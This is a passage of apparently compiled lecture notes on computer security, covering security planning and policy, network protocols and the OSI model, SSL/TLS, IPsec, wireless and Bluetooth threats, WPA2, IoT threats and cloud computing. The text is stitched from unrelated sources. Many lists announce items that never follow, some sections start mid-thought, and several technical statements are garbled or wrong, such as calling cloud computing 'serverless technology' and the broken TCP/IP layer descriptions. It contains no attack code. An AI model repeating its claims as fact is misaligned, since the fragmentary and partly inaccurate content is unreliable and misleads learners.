may be exposed. The organization can determine the vulnerabilities by performing a risk
analysis: a careful investigation of the system, its environment, and the things that might go
wrong. The risk analysis forms the basis for describing the current status of security. The
status can be expressed as a listing of organizational assets, the security threats to the assets,
and the controls in place to protect the assets.
The status portion of the plan also defines the limits of responsibility for security. It
describes not only which assets are to be protected but also who is responsible for protecting
them. The plan may note that some groups may be excluded from responsibility; for example,
joint ventures with other organizations may designate one organization to provide security for
all member organizations. The plan also defines the boundaries of responsibility, especially
when networks are involved. For instance, the plan should clarify who provides the security
for a network router or for a leased line to a remote site.
Even though the security plan should be thorough, there will necessarily be vulnerabilities
that are not considered. These vulnerabilities are not always the result of ignorance rather,
they can arise from the addition of new equipment or data as the system evolves.
They can also result from new situations, such as when a system is used in ways not
anticipated by its designers. The security plan should detail the process to be followed when
someone identifies a new vulnerability. In particular, instructions should explain how to
integrate controls for that vulnerability into the existing security procedures.
3. Requirements:
The heart of the security plan is its set of security requirements: functional or performance
demands placed on a system to ensure a desired level of security. The requirements are
usually derived from organizational needs. Sometimes these needs include the need to
conform to specific security requirements imposed from outside, such as by a government
agency or a commercial standard.
4. Recommended Controls:
The security requirements lay out the system's needs in terms of what should be protected.
The security plan must also recommend what controls should be incorporated into the system
to meet those requirements. Throughout this book you have seen many examples of controls,
so we need not review them here. As we see later in this chapter, we can use risk analysis to
create a map from vulnerabilities to controls. The mapping tells us how the system will meet
the security requirements. That is, the recommended controls address implementation issues:
how the system will be designed and developed to meet stated security requirements.
A section of the security plan should identify which people are responsible for implementing
the security requirements. This documentation assists those who must coordinate their
individual responsibilities with those of other developers. At the same time, the plan makes
explicit who is accountable should some requirement not be met or some vulnerability not be
addressed. That is, the plan notes who is responsible for implementing controls when a new
vulnerability is discovered or a new kind of asset is introduced.
People building, using, and maintaining the system play many roles. Each role can take some
responsibility for one or more aspects of security. Consider, for example, the groups listed
here.
Personal computer users may be responsible for the security of their own machines.
Alternatively, the security plan may designate one person or group to be coordinator of
personal computer security.
Project leaders may be responsible for the security of data and computations.
Timetable
A comprehensive security plan cannot be executed instantly. The security plan includes a
timetable that shows how and when the elements of the plan will be performed. These dates
also give milestones so that management can track the progress of implementation.
7. Continuing Attention:
Good intentions are not enough when it comes to security. We must not only take care in
defining requirements and controls, but we must also find ways for evaluating a system's
security to be sure that the system is as secure as we intend it to be. Thus, the security plan
must call for reviewing the security situation periodically. As users, data, and equipment
change, new exposures may develop. In addition, the current means of control may become
obsolete or ineffective (such as when faster processor times enable attackers to break an
encryption algorithm). The inventory of objects and the list of controls should periodically be
scrutinized and updated, and risk analysis performed anew.
The membership of a computer security planning team must somehow relate to the different
aspects of computer security described in this book. Security in operating systems and
networks requires the cooperation of the systems administration staff. Program security
measures can be understood and recommended by applications programmers. Physical
security controls are implemented by those responsible for general physical security, both
against human attacks and natural disasters. Finally, because controls affect system users, the
plan should incorporate users' views, especially with regard to usability and the general
desirability of controls.
Thus, no matter how it is organized, a security planning team should represent each of the
following groups.
After the plan is written, it must be accepted and its recommendations carried out.
Acceptance by the organization is key; a plan that has no organizational commitment is
simply a plan that collects dust on the shelf. Commitment to the plan means that security
functions will be implemented and security activities carried out. Three groups of people
must contribute to making the plan a success.
The planning team must be sensitive to the needs of each group affected by the plan.
Those affected by the security recommendations must understand what the plan means for
the way they will use the system and perform their business activities. In particular, they
must see how what they do can affect other users and other systems.
Management must be committed to using and enforcing the security aspects of the system.
Management is often reticent to allocate funds for controls until the value of those controls is
explained. As we note in the next section, the results of a risk analysis can help communicate
the financial tradeoffs and benefits of implementing controls. By describing vulnerabilities in
financial terms and in the context of ordinary business activities (such as leaking data to a
competitor or an outsider), security planners can help managers understand the need for
controls.
The plans we have just discussed are part of normal business. They address how a business
handles computer security needs. Similar plans might address how to increase sales or
improve product quality, so these planning activities should be a natural part of management.
Next we turn to two particular kinds of business plans that address specific security problems:
coping with and controlling activity during security incidents.
A business continuity plan documents how a business will continue to function during a
computer security incident. An ordinary security plan covers computer security during
normal times and deals with protecting against a wide range of vulnerabilities from the usual
sources.
Security Policies:
A security policy is a high-level management document to inform all users of the goals of
and constraints on using a system. A policy document is written in broad enough terms that it
does not change frequently. The information security policy is the foundation upon which all
protection efforts are built. It should be a visible representation of priorities of the entire
organization, definitively stating underlying assumptions that drive security activities. The
policy should articulate senior management's decisions regarding security as well as asserting
management's commitment to security. To be effective, the policy must be understood by
everyone as the product of a directive from an authoritative and influential person at the top
of the organization.
Purpose:
Security policies are used for several purposes, including the following:
recognizing sensitive information assets
clarifying security responsibilities
promoting awareness for existing employees
guiding new employees
Audience:
A security policy addresses several different audiences with different expectations. That is,
each group users, owners, and beneficiaries uses the security policy in important but different
ways.
Users
Users legitimately expect a certain degree of confidentiality, integrity, and continuous
availability in the computing resources provided to them. Although the degree varies with the
situation, a security policy should reaffirm a commitment to this requirement for service.
Users also need to know and appreciate what is considered acceptable use of their computers,
data, and programs. For users, a security policy should define acceptable use.
Owners
Each piece of computing equipment is owned by someone, and the owner may not be a
system user. An owner provides the equipment to users for a purpose, such as to further
education, support commerce, or enhance productivity. A security policy should also reflect
the expectations and needs of owners.
Beneficiaries
A business has paying customers or clients; they are beneficiaries of the products and
services offered by that business. At the same time, the general public may benefit in several
ways: as a source of employment or by provision of infrastructure.
Contents:
A security policy must identify its audiences: the beneficiaries, users, and owners. The policy
should describe the nature of each audience and their security goals. Several other sections
are required, including the purpose of the computing system, the resources needing protection,
and the nature of the protection to be supplied.
➢ Purpose
➢ Protected resources
➢ Nature of protection
If a security policy is written poorly, it cannot guide the developers and users in providing
appropriate security mechanisms to protect important assets. Certain characteristics make a
security policy a good one.
➢ Durability
➢ Realism
➢ Usefulness
Network Protocol
What is a network protocol?
A network protocol is a set of established rules that dictate how to format, transmit
and receive data so that computer network devices -- from servers and routers to
endpoints -- can communicate, regardless of the differences in their underlying
infrastructures, designs or standards.
Without computing protocols, computers and other devices would not know how
to engage with each other. As a result, except for specialty networks built around a
specific architecture, few networks would be able to function, and the internet as
we know it wouldn't exist. Virtually all network end users rely on network
protocols for connectivity.
TCP, which uses a set of rules to exchange messages with other internet
points at the information packet level;
User Datagram Protocol, or UDP, which acts as an alternative
communication protocol to TCP and is used to establish low-latency and
loss-tolerating connections between applications and the internet;
IP, which uses a set of rules to send and receive messages at the level of IP
addresses; and
additional network protocols, including Hypertext Transfer Protocol
(HTTP) and File Transfer Protocol (FTP), each of which has defined sets of
rules to exchange and display information.
Every packet transmitted and received over a network contains binary data. Most
computing protocols will add a header at the beginning of each packet in order to
store information about the sender and the message's intended destination. Some
protocols may also include a footer at the end with additional information.
Network protocols process these headers and footers as part of the data moving
among devices in order to identify messages of their own kind.
Network protocols are often set forth in an industry standard -- developed, defined
and published by groups such as the following:
Falling into these three broad categories are thousands of network protocols that
uniformly handle an extensive variety of defined tasks, including authentication,
automation, correction, compression, error handling, file retrieval, file transfer,
link aggregation, routing, semantics, synchronization and syntax.
Network protocol analyzers are tools that protect systems against malicious
activity by supplementing firewalls, antivirus programs and antispyware software.
OSI Model
OSI model is not a network architecture because it does not specify the exact services
and protocols for each layer. It simply tells what each layer should do by defining its
input and output data. It is up to network architects to implement the layers according to
their needs and resources available.
These are the seven layers of the OSI model −
Physical layer −It is the first layer that physically connects the two systems that
need to communicate. It transmits data in bits and manages simplex or duplex
transmission by modem. It also manages Network Interface Card’s hardware
interface to the network, like cabling, cable terminators, topography, voltage levels,
etc.
Data link layer − It is the firmware layer of Network Interface Card. It assembles
datagrams into frames and adds start and stop flags to each frame. It also resolves
problems caused by damaged, lost or duplicate frames.
Network layer − It is concerned with routing, switching and controlling flow of
information between the workstations. It also breaks down transport layer
datagrams into smaller datagrams.
Transport layer − Till the session layer, file is in its own form. Transport layer
breaks it down into data frames, provides error checking at network segment level
and prevents a fast host from overrunning a slower one. Transport layer isolates
the upper layers from network hardware.
Session layer − This layer is responsible for establishing a session between two
workstations that want to exchange data.
Application layer − It is the topmost layer of the network that is responsible for
sending application requests by the user to the lower levels. Typical applications
include file transfer, E-mail, remote logon, data entry, etc.
It is not necessary for every network to have all the layers. For example, network layer is
not there in broadcast networks.
When a system wants to share data with another workstation or send a request over the
network, it is received by the application layer. Data then proceeds to lower layers after
processing till it reaches the physical layer.
At the physical layer, the data is actually transferred and received by the physical layer of
the destination workstation. There, the data proceeds to upper layers after processing till it
reaches application layer.
At the application layer, data or request is shared with the workstation. So each layer has
opposite functions for source and destination workstations. For example, data link layer
of the source workstation adds start and stop flags to the frames but the same layer of the
destination workstation will remove the start and stop flags from the frames.
Let us now see some of the protocols used by different layers to accomplish user requests.
TCP/IP
TCP/IP stands for Transmission Control Protocol/Internet Protocol. TCP/IP is a set of
layered protocols used for communication over the Internet. The communication model of
this suite is client-server model. A computer that sends a request is the client and a
computer to which the request is sent is the server.
TCP/IP has four layers −
Application layer − Application layer protocols like HTTP and FTP are used.
Data link layer − Actual data transmission in bits occurs at the data link layer
using the destination address provided by network layer.
TCP/IP is widely used in many communication networks other than the Internet.
FTP
As we have seen, the need for network came up primarily to facilitate sharing of files
between researchers. And to this day, file transfer remains one of the most used
facilities.The protocol that handles these requests is File Transfer Protocol or FTP.
Using FTP to transfer files is helpful in these ways −
PPP
Point to Point Protocol or PPP is a data link layer protocol that enables transmission of
TCP/IP traffic over serial connection, like telephone line.
A framing method to clearly define end of one frame and start of another,
incorporating errors detection as well.
Link control protocol (LCP) for bringing communication lines up, authenticating
and bringing them down when no longer needed.
Network control protocol (NCP) for each network layer protocol supported by
other networks.
Using PPP, home users can avail Internet connection over telephone lines.
Transport Layer Security
Transport Layer Security (TLS) is an Internet Engineering Task Force (IETF)
standard protocol that provides authentication, privacy and data integrity between
two communicating computer applications. It's the most widely deployed security
protocol in use today and is best suited for web browsers and other applications
that require data to be securely exchanged over a network. This includes web
browsing sessions, file transfers, virtual private network (VPN) connections,
remote desktop sessions and voice over IP (VoIP). More recently, TLS is being
integrated into modern cellular transport technologies, including 5G, to protect
core network functions throughout the radio access network (RAN).
Architecture of SSL
SSL is specific to TCP and it does not work with UDP. SSL provides Application
Programming Interface (API) to applications. C and Java SSL libraries/classes are readily
available.
SSL protocol is designed to interwork between application and transport layer as shown
in the following image −
SSL itself is not a single layer protocol as depicted in the image; in fact it is composed of
two sub-layers.
Lower sub-layer comprises of the one component of SSL protocol called as SSL
Record Protocol. This component provides integrity and confidentiality services.
Upper sub-layer comprises of three SSL-related protocol components and an
application protocol. Application component provides the information transfer
service between client/server interactions. Technically, it can operate on top of
SSL layer as well. Three SSL related protocol components are −
It is the most complex part of SSL. It is invoked before any application data
is transmitted. It creates SSL sessions between the client and the server.
Multiple secure TCP connections between a client and a server can share
the same session.
Handshake protocol actions through four phases. These are discussed in the
next section.
ChangeCipherSpec Protocol
The cipher parameters pending state is copied into the current state.
Exchange of this Message indicates all future data exchanges are encrypted
and integrity is protected.
It is also used for other purposes – such as notify closure of the TCP
connection, notify receipt of bad or unknown certificate, etc.
TLS Protocol
In order to provide an open Internet standard of SSL, IETF released The Transport Layer
Security (TLS) protocol in January 1999. TLS is defined as a proposed Internet Standard
in RFC 5246.
Salient Features
TLS protocol sits above the reliable connection-oriented transport TCP layer in the
networking layers stack.
The architecture of TLS protocol is similar to SSLv3 protocol. It has two sub
protocols: the TLS Record protocol and the TLS Handshake protocol.
Though SSLv3 and TLS protocol have similar architecture, several changes were
made in architecture and functioning particularly for the handshake protocol.
Protocol Version − The header of TLS protocol segment carries the version
number 3.1 to differentiate between number 3 carried by SSL protocol segment
header.
Session Key Generation − There are two differences between TLS and SSL
protocol for generation of key material.
The algorithm for computing session keys and initiation values (IV) is
different in TLS than SSL protocol.
TLS protocol supports all the messages used by the Alert protocol of SSL,
except No certificate alert message being made redundant. The client sends
empty certificate in case client authentication is not required.
Many additional Alert messages are included in TLS protocol for other
error conditions such as record_overflow, decode_error etc.
Supported Cipher Suites − SSL supports RSA, Diffie-Hellman and Fortezza
cipher suites. TLS protocol supports all suits except Fortezza.
Padding of Data − In SSL protocol, the padding added to user data before
encryption is the minimum amount required to make the total data-size equal to a
multiple of the cipher’s block length. In TLS, the padding can be any amount that
results in data-size that is a multiple of the cipher’s block length, up to a maximum
of 255 bytes.
The above differences between TLS and SSLv3 protocols are summarized in the
following table.
SSH Defined
SSH is organized as three sub-protocols.
IPsec protects the entire packet presented to IP layer including higher layer
headers.
Since higher layer headers are hidden which carry port number, traffic analysis is
more difficult.
IPsec works from one network entity to another network entity, not from
application process to application process. Hence, security can be adopted without
requiring changes to individual user computers/applications.
Security Functions
The important security functions provided by the IPsec are as follows −
Confidentiality
Key management.
IKE defines two protocol (Oakley and SKEME) to be used with already
defined key management framework Internet Security Association Key
Management Protocol (ISAKMP).
ISAKMP is not IPsec specific, but provides the framework for creating SAs
for any protocol.
This chapter mainly discusses the IPsec communication and associated protocol
employed to achieve security.
The original IP header is maintained and the data is forwarded based on the
original attributes set by the upper layer protocol.
This mode of IPsec provides encapsulation services along with other security
services.
In tunnel mode operations, the entire packet from upper layer is encapsulated
before applying security protocol. New IP header is added.
IPsec Protocols
IPsec uses the security protocols to provide desired security services. These protocols are
the heart of IPsec operations and everything else is designed to support these protocol in
IPsec.
Security associations between the communicating entities are established and maintained
by the security protocol used.
There are two security protocols defined by IPsec — Authentication Header (AH) and
Encapsulating Security Payload (ESP).
Authentication Header
The AH protocol provides service of data integrity and origin authentication. It optionally
caters for message replay resistance. However, it does not provide any form of
confidentiality.
AH is a protocol that provides authentication of either all or part of the contents of a
datagram by the addition of a header. The header is calculated based on the values in the
datagram. What parts of the datagram are used for the calculation, and where to place the
header, depends on the mode cooperation (tunnel or transport).
The operation of the AH protocol is surprisingly simple. It can be considered similar to
the algorithms used to calculate checksums or perform CRC checks for error detection.
The concept behind AH is the same, except that instead of using a simple algorithm, AH
uses special hashing algorithm and a secret key known only to the communicating parties.
A security association between two devices is set up that specifies these particulars.
The process of AH goes through the following phases.
When IP packet is received from upper protocol stack, IPsec determine the
associated Security Association (SA) from available information in the packet; for
example, IP address (source and destination).
From SA, once it is identified that security protocol is AH, the parameters of AH
header are calculated. The AH header consists of the following parameters −
The header field specifies the protocol of packet following AH header. Sequence
Parameter Index (SPI) is obtained from SA existing between communicating
parties.
Once it is determined that ESP is involved, the fields of ESP packet are calculated.
The ESP field arrangement is depicted in the following diagram.
Although authentication and confidentiality are the primary services provided by ESP,
both are optional. Technically, we can use NULL encryption without authentication.
However, in practice, one of the two must be implemented to use ESP effectively.
The basic concept is to use ESP when one wants authentication and encryption, and to use
AH when one wants extended authentication without encryption.
SA is simple in nature and hence two SAs are required for bi-directional
communications.
SAs are identified by a Security Parameter Index (SPI) number that exists in the
security protocol header.
Both sending and receiving entities maintain state information about the SA. It is
similar to TCP endpoints which also maintain state information. IPsec is
connection-oriented like TCP.
Parameters of SA
Any SA is uniquely identified by the following three parameters −
Security Parameters Index (SPI).
Every packet of IPsec carries a header containing SPI field. The SPI is
provided to map the incoming packet to an SA.
Wireless Security
Wireless LANs
Devices
• Laptops (canonical wireless devices)
• Desktops, mobile phones, ....
• Bluetooth
Bluetooth
• A standard for building very small personal area
networks (PANs)
• Connects just everything you can name: PDAs,
phones, keyboards, mice, your car
• Very short range range network: 1 meter, 10
meters, 100 meters (rare)
• Advertised as solution to "too many cables"
• Authentication
– "pairing" uses pass-phrase style authentication to
establish relationship which is often stored
indefinitely (problem?)
Bluetooth Security
• Everything really works off the PIN
• Attacks have progressively been successful at
identifying vulnerabilities in the way PINs are used,
can be reverse engineered
• Privacy: know what is on and how public it is ...
• Problem: Cambridgeshire, England
• Problem: Bluetooth rifle
Wireless Network Threats
• Accidental association : A user intending to connect to one LAN may
unintentionally lock on to a wireless access point from a neighboring
network.
• Malicious association : a wireless device is configured to appear to be
a
legitimate access point, enabling the operator to steal passwords from
legitimate users and then penetrate a wired network through a legitimate
wireless access point.
• Ad hoc networks : peer-to-peer networks between wireless computers
with no access point between them
• Nontraditional networks : Nontraditional networks and links, such as
personal network Bluetooth devices, barcode readers, and handheld
PDAs, pose a security risk in terms of both eavesdropping and
spoofing
• Identity theft (MAC spoofing): This occurs when an attacker is able to
eavesdrop on network traffic and identify the MAC address of a
computer with network privileges.
• Man-in-the middle attacks: This attack involves persuading a user and
an access point to believe that they are talking to each other when in
fact the communication is going through an intermediate attacking
device. Wireless networks are particularly vulnerable to such attacks.
• Denial of service (DoS): The wireless environment lends itself to this
type of attack, because it is so easy for the attacker to direct multiple
wireless messages at the target.
• Network injection: A network injection attack targets wireless access
points that are exposed to nonfiltered network traffic, such as routing
protocol messages or network management messages. An example of
such an attack is one in which bogus reconfiguration commands are
used to affect routers and switches to degrade network performance.
Wireless Security Measures
Securing Wireless Transmissions
principal threats to wireless transmission are eavesdropping, altering or
inserting messages, and disruption
• Signal-hiding techniques: Organizations can take a number of
measures
to make it more difficult for an attacker to locate their wireless access
points, including turning off service set identifier (SSID) broadcasting by
wireless access points; assigning cryptic names to SSIDs; reducing
signal strength to the lowest level that still provides requisite coverage;
and locating wireless access points in the interior of the building, away
from windows and exterior walls. Greater security can be achieved by
the use of directional antennas and of signal-shielding techniques.
• Encryption: Encryption of all wireless transmission is effective against
eavesdropping to the extent that the encryption keys are secured.
Securing Wireless Access Points
The main threat involving wireless access points is unauthorized access to
the
network. The principal approach for preventing such access is the IEEE
802.1X standard for port-based network access control.
Securing Wireless Networks
1. Use encryption. Wireless routers are typically equipped with built-in
encryption mechanisms for router-to-router traffic.
2. Use antivirus and antispyware software, and a firewall.
3. Turn off identifier broadcasting. If a network is configured so that
authorized devices know the identity of routers, this capability can be
disabled, so as to thwart attackers.
4. Change the identifier on your router from the default.
5. Change your router’s pre-set password for administration. This is
another
prudent step.
6. Allow only specific computers to access your wireless network. A
router can
be configured to only communicate with approved MAC addresses.
Mobile Device Security
Security Threats
SP 800-14 lists seven major security concerns for mobile
devices.
• Lack of Physical Security Controls
Mobile device is required to remain on premises, the user
may move the device within the organization between secure
and nonsecured locations. theft and tampering are realistic
threats.
The threat is two fold:
1) A malicious party may attempt to recover sensitive data from the
device
itself
2) may use the device to gain access to the organization’s resources.
It also introduced the Message Integrity Check, which scanned for any
altered packets sent by hackers, the Temporal Key Integrity Protocol
(TKIP), and the pre-shared key (PSK), among others, for encryption.
WPA2 has been the industry standard since its inception, on March 13,
2006, the Wi-Fi Alliance stated that all future devices with the Wi-Fi
trademark had to use WPA2.
WPA2-PSK
WPA2-PSK (Pre-Shared Key) requires a single password to get on the
wireless network. It’s generally accepted that a single password to access
Wi-Fi is safe but only as much as you trust those using it. A major
vulnerability comes from the potential damage done when login
credentials get placed in the wrong hands. That is why this protocol is
most often used for a residential or open Wi-Fi network.
To encrypt a network with WPA2-PSK you provide your router not with
an encryption key, but rather with a plain-English passphrase between 8
and 63 characters long. Using CCMP, that passphrase, along with the
network SSID, is used to generate unique encryption keys for each
wireless client. And those encryption keys are constantly changed.
Although WEP also supports passphrases, it does so only as a way to
more easily create static keys, which are usually composed of the hex
characters 0-9 and A-F.
EAP/LEAP
LEAP uses dynamic Wired Equivalent Privacy (WEP) keys that are
changed with more frequent authentications between a client and
a RADIUS server. WEP keys are less likely to be cracked -- and less
long-lived if cracked -- due to this frequency.
Application
Threats to Security and Privacy of IoT Devices
As technology is becoming advanced, attacks on internet devices are increasing very
rapidly and becoming more and more common. Now, security and privacy have
become a very important aspect of any IoT device. In this article, we will discuss
some most common threats to the security and privacy of IoT devices.
1. Weak Credentials
Generally, large manufactures ship their products with a username of “admin” and
with the password “0000” or “1234” and the consumers of these devices don’t change
them until they were forced to that by security executive. These kinds of acts make a
path for hackers to hack consumer’s privacy and let them control the consumer’s
device. In 2016, the Mirai botnet Attack as a result of using weak credentials.
IoT devices have a very complex structure that makes it difficult to find the fault in
devices. Even if a device is hacked the owner of that device will be unaware of that
fact. Hackers can force the device to join any malicious botnets or the device may get
infected by any virus. We can not directly say that the device was hacked because of
its complex structure. A few years ago, a security agency has proved that a smart
refrigerator was found sent thousand plus spam mails. The interesting fact was that
the owner of that refrigerator even did not know about that.
It has been seen that IoT devices are secured when they are shipped. But the issues
come here when these devices do not get regular updates. When a company
manufactures its device, it makes the devices secure from all the threats of that time
but as we discussed earlier, the Internet and technologies are growing at a very fast
rate. So after a year or two, it becomes very easy for hackers to find the weakness of
old devices with modern technologies. That’s why security updates are the most
important ones.
With the advancement of the internet, hackers are also getting advanced. In the past
few years, there is a rapid increase in malicious software or ransomware. This is
causing a big challenge for IoT device manufacturers to secure their devices.
5. Small Scale Attacks
IoT devices are attacked on a very small scale. Manufacturing companies are trying to
secure their devices for large scale attacks but no company is paying to attention small
attacks. Hackers do small attacks on IoT devices such as baby monitoring devices or
open wireless connections and then forced to join botnets.
It is very difficult to transmit data securely in such a large amount as there are billions
of IoT enabled devices. There is always a risk of data leaking or get infected or
corrupted.
7. Smart Objects
Smart objects are the main building block of any device. These smart objects should
able to communicate with another object or device or a sensor in any infrastructure
securely. Even while these devices or objects are not aware of each other’s network
status. This is also an important issue. Hackers can hack these devices in open
wireless networks.
Cloud Computing :
Cloud Computing is a type of technology that provides remote services on the internet
to manage, access, and store data rather than storing it on Servers or local drives. This
technology is also known as Serverless technology. Here the data can be anything like
Image, Audio, video, documents, files, etc.
Need of Cloud Computing :
Before using Cloud Computing, most of the large as well as small IT companies use
traditional methods i.e. they store data in Server, and they need a separate Server
room for that. In that Server Room, there should be a database server, mail server,
firewalls, routers, modems, high net speed devices, etc. For that IT companies have to
spend lots of money. In order to reduce all the problems with cost Cloud computing
come into existence and most companies shift to this technology.
5. Lack of Skill –
While working, shifting o another service provider, need an extra feature, how to
use a feature, etc. are the main problems caused in IT Company who doesn’t have
skilled Employee. So it requires a skilled person to work with cloud Computing.